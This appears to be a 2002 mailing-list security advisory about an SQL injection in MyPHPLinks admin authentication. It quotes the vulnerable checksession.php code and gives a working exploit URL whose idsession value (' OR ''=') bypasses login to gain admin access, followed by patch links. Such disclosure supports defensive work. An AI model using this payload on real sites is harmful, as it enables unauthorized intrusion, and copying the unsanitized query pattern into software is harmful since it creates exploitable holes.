Informations : °°°°°°°°°°°°°° Website : http://www.myphpsoft.net Version : ? -> 2.1.9, 2.2.0CVS Problem : SQL Injection -> Admin access PHP Code/Location : °°°°°°°°°°°°°°°°°°° admin/auth/checksession.php --------------------------------------------------------------- [...] if($idsession!=''){ $dbs = new data(0,$MyPHPLinksHote, $MyPHPLinksBase, $MyPHPLinksUser, $MyPHPLinksPass); if(!$dbs->connect()) die($dbs->error); if(!$dbs->query("select count(*) as nb from ".$MyPHPLinksTBAuth." where session='".$idsession."' and timesession > now()")) die($dbs->error); while($dbs->nextrecord()){ $loginauth = $dbs->valeur("nb"); } if ($loginauth==0){ header("Location:$MyPHPLinksAuthPErrDef");exit; }else{ if(!$dbs->query("UPDATE ".$MyPHPLinksTBAuth." set timesession=now()+".$MyPHPLinksTLSession." where session='".$idsession."'")) die($dbs->error); } }else{ header("Location:$MyPHPLinksAuthPErrDef");exit; } ?> --------------------------------------------------------------- Exploit : °°°°°°°°° http://[target]/admin/index.php?idsession='%20OR%20''=' Patch : °°°°°°° A patch can be downloaded on http://www.phpsecure.org/index.php?zone=pPatchA&sAlpha=m . More details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/MyPhpLinks.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyPhpLinks.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _________________________________________________________________ MSN Search, le moteur de recherche qui pense comme vous ! http://search.msn.fr/worldwide.asp
This archive was generated by hypermail 2b30 : Sat Dec 14 2002 - 12:54:12 PST